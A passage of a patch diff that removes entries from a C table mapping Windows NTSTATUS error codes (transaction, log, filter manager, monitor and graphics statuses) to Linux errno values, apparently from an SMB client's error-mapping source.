+-	{STATUS_TRANSACTION_OBJECT_EXPIRED, -EIO,
+-	"STATUS_TRANSACTION_OBJECT_EXPIRED"},
+-	{STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION, -EIO,
+-	"STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION"},
+-	{STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED, -EIO,
+-	"STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED"},
+-	{STATUS_TRANSACTION_RECORD_TOO_LONG, -EIO,
+-	"STATUS_TRANSACTION_RECORD_TOO_LONG"},
+-	{STATUS_NO_LINK_TRACKING_IN_TRANSACTION, -EIO,
+-	"STATUS_NO_LINK_TRACKING_IN_TRANSACTION"},
+-	{STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION, -EOPNOTSUPP,
+-	"STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION"},
+-	{STATUS_TRANSACTION_INTEGRITY_VIOLATED, -EIO,
+-	"STATUS_TRANSACTION_INTEGRITY_VIOLATED"},
+-	{STATUS_LOG_SECTOR_INVALID, -EIO, "STATUS_LOG_SECTOR_INVALID"},
+-	{STATUS_LOG_SECTOR_PARITY_INVALID, -EIO,
+-	"STATUS_LOG_SECTOR_PARITY_INVALID"},
+-	{STATUS_LOG_SECTOR_REMAPPED, -EIO, "STATUS_LOG_SECTOR_REMAPPED"},
+-	{STATUS_LOG_BLOCK_INCOMPLETE, -EIO, "STATUS_LOG_BLOCK_INCOMPLETE"},
+-	{STATUS_LOG_INVALID_RANGE, -EIO, "STATUS_LOG_INVALID_RANGE"},
+-	{STATUS_LOG_BLOCKS_EXHAUSTED, -EIO, "STATUS_LOG_BLOCKS_EXHAUSTED"},
+-	{STATUS_LOG_READ_CONTEXT_INVALID, -EIO,
+-	"STATUS_LOG_READ_CONTEXT_INVALID"},
+-	{STATUS_LOG_RESTART_INVALID, -EIO, "STATUS_LOG_RESTART_INVALID"},
+-	{STATUS_LOG_BLOCK_VERSION, -EIO, "STATUS_LOG_BLOCK_VERSION"},
+-	{STATUS_LOG_BLOCK_INVALID, -EIO, "STATUS_LOG_BLOCK_INVALID"},
+-	{STATUS_LOG_READ_MODE_INVALID, -EIO, "STATUS_LOG_READ_MODE_INVALID"},
+-	{STATUS_LOG_METADATA_CORRUPT, -EIO, "STATUS_LOG_METADATA_CORRUPT"},
+-	{STATUS_LOG_METADATA_INVALID, -EIO, "STATUS_LOG_METADATA_INVALID"},
+-	{STATUS_LOG_METADATA_INCONSISTENT, -EIO,
+-	"STATUS_LOG_METADATA_INCONSISTENT"},
+-	{STATUS_LOG_RESERVATION_INVALID, -EIO,
+-	"STATUS_LOG_RESERVATION_INVALID"},
+-	{STATUS_LOG_CANT_DELETE, -EIO, "STATUS_LOG_CANT_DELETE"},
+-	{STATUS_LOG_CONTAINER_LIMIT_EXCEEDED, -EIO,
+-	"STATUS_LOG_CONTAINER_LIMIT_EXCEEDED"},
+-	{STATUS_LOG_START_OF_LOG, -EIO, "STATUS_LOG_START_OF_LOG"},
+-	{STATUS_LOG_POLICY_ALREADY_INSTALLED, -EIO,
+-	"STATUS_LOG_POLICY_ALREADY_INSTALLED"},
+-	{STATUS_LOG_POLICY_NOT_INSTALLED, -EIO,
+-	"STATUS_LOG_POLICY_NOT_INSTALLED"},
+-	{STATUS_LOG_POLICY_INVALID, -EIO, "STATUS_LOG_POLICY_INVALID"},
+-	{STATUS_LOG_POLICY_CONFLICT, -EIO, "STATUS_LOG_POLICY_CONFLICT"},
+-	{STATUS_LOG_PINNED_ARCHIVE_TAIL, -EIO,
+-	"STATUS_LOG_PINNED_ARCHIVE_TAIL"},
+-	{STATUS_LOG_RECORD_NONEXISTENT, -EIO, "STATUS_LOG_RECORD_NONEXISTENT"},
+-	{STATUS_LOG_RECORDS_RESERVED_INVALID, -EIO,
+-	"STATUS_LOG_RECORDS_RESERVED_INVALID"},
+-	{STATUS_LOG_SPACE_RESERVED_INVALID, -EIO,
+-	"STATUS_LOG_SPACE_RESERVED_INVALID"},
+-	{STATUS_LOG_TAIL_INVALID, -EIO, "STATUS_LOG_TAIL_INVALID"},
+-	{STATUS_LOG_FULL, -EIO, "STATUS_LOG_FULL"},
+-	{STATUS_LOG_MULTIPLEXED, -EIO, "STATUS_LOG_MULTIPLEXED"},
+-	{STATUS_LOG_DEDICATED, -EIO, "STATUS_LOG_DEDICATED"},
+-	{STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS, -EIO,
+-	"STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS"},
+-	{STATUS_LOG_ARCHIVE_IN_PROGRESS, -EIO,
+-	"STATUS_LOG_ARCHIVE_IN_PROGRESS"},
+-	{STATUS_LOG_EPHEMERAL, -EIO, "STATUS_LOG_EPHEMERAL"},
+-	{STATUS_LOG_NOT_ENOUGH_CONTAINERS, -EIO,
+-	"STATUS_LOG_NOT_ENOUGH_CONTAINERS"},
+-	{STATUS_LOG_CLIENT_ALREADY_REGISTERED, -EIO,
+-	"STATUS_LOG_CLIENT_ALREADY_REGISTERED"},
+-	{STATUS_LOG_CLIENT_NOT_REGISTERED, -EIO,
+-	"STATUS_LOG_CLIENT_NOT_REGISTERED"},
+-	{STATUS_LOG_FULL_HANDLER_IN_PROGRESS, -EIO,
+-	"STATUS_LOG_FULL_HANDLER_IN_PROGRESS"},
+-	{STATUS_LOG_CONTAINER_READ_FAILED, -EIO,
+-	"STATUS_LOG_CONTAINER_READ_FAILED"},
+-	{STATUS_LOG_CONTAINER_WRITE_FAILED, -EIO,
+-	"STATUS_LOG_CONTAINER_WRITE_FAILED"},
+-	{STATUS_LOG_CONTAINER_OPEN_FAILED, -EIO,
+-	"STATUS_LOG_CONTAINER_OPEN_FAILED"},
+-	{STATUS_LOG_CONTAINER_STATE_INVALID, -EIO,
+-	"STATUS_LOG_CONTAINER_STATE_INVALID"},
+-	{STATUS_LOG_STATE_INVALID, -EIO, "STATUS_LOG_STATE_INVALID"},
+-	{STATUS_LOG_PINNED, -EIO, "STATUS_LOG_PINNED"},
+-	{STATUS_LOG_METADATA_FLUSH_FAILED, -EIO,
+-	"STATUS_LOG_METADATA_FLUSH_FAILED"},
+-	{STATUS_LOG_INCONSISTENT_SECURITY, -EIO,
+-	"STATUS_LOG_INCONSISTENT_SECURITY"},
+-	{STATUS_LOG_APPENDED_FLUSH_FAILED, -EIO,
+-	"STATUS_LOG_APPENDED_FLUSH_FAILED"},
+-	{STATUS_LOG_PINNED_RESERVATION, -EIO, "STATUS_LOG_PINNED_RESERVATION"},
+-	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
+-	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD"},
+-	{STATUS_FLT_NO_HANDLER_DEFINED, -EIO, "STATUS_FLT_NO_HANDLER_DEFINED"},
+-	{STATUS_FLT_CONTEXT_ALREADY_DEFINED, -EIO,
+-	"STATUS_FLT_CONTEXT_ALREADY_DEFINED"},
+-	{STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST, -EIO,
+-	"STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST"},
+-	{STATUS_FLT_DISALLOW_FAST_IO, -EIO, "STATUS_FLT_DISALLOW_FAST_IO"},
+-	{STATUS_FLT_INVALID_NAME_REQUEST, -EIO,
+-	"STATUS_FLT_INVALID_NAME_REQUEST"},
+-	{STATUS_FLT_NOT_SAFE_TO_POST_OPERATION, -EIO,
+-	"STATUS_FLT_NOT_SAFE_TO_POST_OPERATION"},
+-	{STATUS_FLT_NOT_INITIALIZED, -EIO, "STATUS_FLT_NOT_INITIALIZED"},
+-	{STATUS_FLT_FILTER_NOT_READY, -EIO, "STATUS_FLT_FILTER_NOT_READY"},
+-	{STATUS_FLT_POST_OPERATION_CLEANUP, -EIO,
+-	"STATUS_FLT_POST_OPERATION_CLEANUP"},
+-	{STATUS_FLT_INTERNAL_ERROR, -EIO, "STATUS_FLT_INTERNAL_ERROR"},
+-	{STATUS_FLT_DELETING_OBJECT, -EIO, "STATUS_FLT_DELETING_OBJECT"},
+-	{STATUS_FLT_MUST_BE_NONPAGED_POOL, -EIO,
+-	"STATUS_FLT_MUST_BE_NONPAGED_POOL"},
+-	{STATUS_FLT_DUPLICATE_ENTRY, -EIO, "STATUS_FLT_DUPLICATE_ENTRY"},
+-	{STATUS_FLT_CBDQ_DISABLED, -EIO, "STATUS_FLT_CBDQ_DISABLED"},
+-	{STATUS_FLT_DO_NOT_ATTACH, -EIO, "STATUS_FLT_DO_NOT_ATTACH"},
+-	{STATUS_FLT_DO_NOT_DETACH, -EIO, "STATUS_FLT_DO_NOT_DETACH"},
+-	{STATUS_FLT_INSTANCE_ALTITUDE_COLLISION, -EIO,
+-	"STATUS_FLT_INSTANCE_ALTITUDE_COLLISION"},
+-	{STATUS_FLT_INSTANCE_NAME_COLLISION, -EIO,
+-	"STATUS_FLT_INSTANCE_NAME_COLLISION"},
+-	{STATUS_FLT_FILTER_NOT_FOUND, -EIO, "STATUS_FLT_FILTER_NOT_FOUND"},
+-	{STATUS_FLT_VOLUME_NOT_FOUND, -EIO, "STATUS_FLT_VOLUME_NOT_FOUND"},
+-	{STATUS_FLT_INSTANCE_NOT_FOUND, -EIO, "STATUS_FLT_INSTANCE_NOT_FOUND"},
+-	{STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND, -EIO,
+-	"STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND"},
+-	{STATUS_FLT_INVALID_CONTEXT_REGISTRATION, -EIO,
+-	"STATUS_FLT_INVALID_CONTEXT_REGISTRATION"},
+-	{STATUS_FLT_NAME_CACHE_MISS, -EIO, "STATUS_FLT_NAME_CACHE_MISS"},
+-	{STATUS_FLT_NO_DEVICE_OBJECT, -EIO, "STATUS_FLT_NO_DEVICE_OBJECT"},
+-	{STATUS_FLT_VOLUME_ALREADY_MOUNTED, -EIO,
+-	"STATUS_FLT_VOLUME_ALREADY_MOUNTED"},
+-	{STATUS_FLT_ALREADY_ENLISTED, -EIO, "STATUS_FLT_ALREADY_ENLISTED"},
+-	{STATUS_FLT_CONTEXT_ALREADY_LINKED, -EIO,
+-	"STATUS_FLT_CONTEXT_ALREADY_LINKED"},
+-	{STATUS_FLT_NO_WAITER_FOR_REPLY, -EIO,
+-	"STATUS_FLT_NO_WAITER_FOR_REPLY"},
+-	{STATUS_MONITOR_NO_DESCRIPTOR, -EIO, "STATUS_MONITOR_NO_DESCRIPTOR"},
+-	{STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT, -EIO,
+-	"STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT"},
+-	{STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM, -EIO,
+-	"STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM"},
+-	{STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK"},
+-	{STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED, -EIO,
+-	"STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED"},
+-	{STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK"},
+-	{STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK"},
+-	{STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA, -EIO,
+-	"STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA"},
+-	{STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK"},
+-	{STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER, -EIO,
+-	"STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER"},
+-	{STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER, -EIO,
+-	"STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER"},
+-	{STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER, -EIO,
+-	"STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER"},
+-	{STATUS_GRAPHICS_ADAPTER_WAS_RESET, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_WAS_RESET"},
+-	{STATUS_GRAPHICS_INVALID_DRIVER_MODEL, -EIO,
+-	"STATUS_GRAPHICS_INVALID_DRIVER_MODEL"},
+-	{STATUS_GRAPHICS_PRESENT_MODE_CHANGED, -EIO,
+-	"STATUS_GRAPHICS_PRESENT_MODE_CHANGED"},
+-	{STATUS_GRAPHICS_PRESENT_OCCLUDED, -EIO,
+-	"STATUS_GRAPHICS_PRESENT_OCCLUDED"},
+-	{STATUS_GRAPHICS_PRESENT_DENIED, -EIO,
+-	"STATUS_GRAPHICS_PRESENT_DENIED"},
+-	{STATUS_GRAPHICS_CANNOTCOLORCONVERT, -EIO,
+-	"STATUS_GRAPHICS_CANNOTCOLORCONVERT"},
+-	{STATUS_GRAPHICS_NO_VIDEO_MEMORY, -EIO,
+-	"STATUS_GRAPHICS_NO_VIDEO_MEMORY"},
+-	{STATUS_GRAPHICS_CANT_LOCK_MEMORY, -EIO,
+-	"STATUS_GRAPHICS_CANT_LOCK_MEMORY"},
+-	{STATUS_GRAPHICS_ALLOCATION_BUSY, -EBUSY,
+-	"STATUS_GRAPHICS_ALLOCATION_BUSY"},
+-	{STATUS_GRAPHICS_TOO_MANY_REFERENCES, -EIO,
+-	"STATUS_GRAPHICS_TOO_MANY_REFERENCES"},
+-	{STATUS_GRAPHICS_TRY_AGAIN_LATER, -EIO,
+-	"STATUS_GRAPHICS_TRY_AGAIN_LATER"},
+-	{STATUS_GRAPHICS_TRY_AGAIN_NOW, -EIO, "STATUS_GRAPHICS_TRY_AGAIN_NOW"},
+-	{STATUS_GRAPHICS_ALLOCATION_INVALID, -EIO,
+-	"STATUS_GRAPHICS_ALLOCATION_INVALID"},
+-	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE, -EIO,
+-	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE"},
+-	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED"},
+-	{STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION, -EIO,
+-	"STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION"},
+-	{STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE"},
+-	{STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION, -EIO,
+-	"STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION"},
+-	{STATUS_GRAPHICS_ALLOCATION_CLOSED, -EIO,
+-	"STATUS_GRAPHICS_ALLOCATION_CLOSED"},
+-	{STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE"},
+-	{STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE"},
+-	{STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE"},
+-	{STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST, -EIO,
+-	"STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST"},
+-	{STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN, -EIO, "STATUS_GRAPHICS_INVALID_VIDPN"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET"},
+-	{STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET"},
+-	{STATUS_GRAPHICS_INVALID_FREQUENCY, -EIO,
+-	"STATUS_GRAPHICS_INVALID_FREQUENCY"},
+-	{STATUS_GRAPHICS_INVALID_ACTIVE_REGION, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ACTIVE_REGION"},
+-	{STATUS_GRAPHICS_INVALID_TOTAL_REGION, -EIO,
+-	"STATUS_GRAPHICS_INVALID_TOTAL_REGION"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE"},
+-	{STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET"},
+-	{STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET, -EIO,
+-	"STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET"},
+-	{STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_TARGET_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_TARGET_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH"},
+-	{STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE"},
+-	{STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET"},
+-	{STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_STALE_MODESET, -EIO, "STATUS_GRAPHICS_STALE_MODESET"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE"},
+-	{STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN, -EIO,
+-	"STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN"},
+-	{STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION, -EIO,
+-	"STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION"},
+-	{STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES, -EIO,
+-	"STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES"},
+-	{STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE"},
+-	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET"},
+-	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET"},
+-	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR"},
+-	{STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET"},
+-	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE"},
+-	{STATUS_GRAPHICS_RESOURCES_NOT_RELATED, -EIO,
+-	"STATUS_GRAPHICS_RESOURCES_NOT_RELATED"},
+-	{STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET, -EIO,
+-	"STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET"},
+-	{STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER, -EIO,
+-	"STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER"},
+-	{STATUS_GRAPHICS_NO_VIDPNMGR, -EIO, "STATUS_GRAPHICS_NO_VIDPNMGR"},
+-	{STATUS_GRAPHICS_NO_ACTIVE_VIDPN, -EIO,
+-	"STATUS_GRAPHICS_NO_ACTIVE_VIDPN"},
+-	{STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_MONITOR_NOT_CONNECTED, -EIO,
+-	"STATUS_GRAPHICS_MONITOR_NOT_CONNECTED"},
+-	{STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE"},
+-	{STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE"},
+-	{STATUS_GRAPHICS_INVALID_STRIDE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_STRIDE"},
+-	{STATUS_GRAPHICS_INVALID_PIXELFORMAT, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PIXELFORMAT"},
+-	{STATUS_GRAPHICS_INVALID_COLORBASIS, -EIO,
+-	"STATUS_GRAPHICS_INVALID_COLORBASIS"},
+-	{STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE"},
+-	{STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT, -EIO,
+-	"STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT"},
+-	{STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE"},
+-	{STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN, -EIO,
+-	"STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN"},
+-	{STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL"},
+-	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION"},
+-	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED,
+-	-EIO,
+-	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_GAMMA_RAMP, -EIO,
+-	"STATUS_GRAPHICS_INVALID_GAMMA_RAMP"},
+-	{STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_MODE_NOT_IN_MODESET, -EIO,
+-	"STATUS_GRAPHICS_MODE_NOT_IN_MODESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON"},
+-	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE"},
+-	{STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE"},
+-	{STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS, -EIO,
+-	"STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS"},
+-	{STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING, -EIO,
+-	"STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING"},
+-	{STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED, -EIO,
+-	"STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED"},
+-	{STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS, -EIO,
+-	"STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS"},
+-	{STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT, -EIO,
+-	"STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT"},
+-	{STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM"},
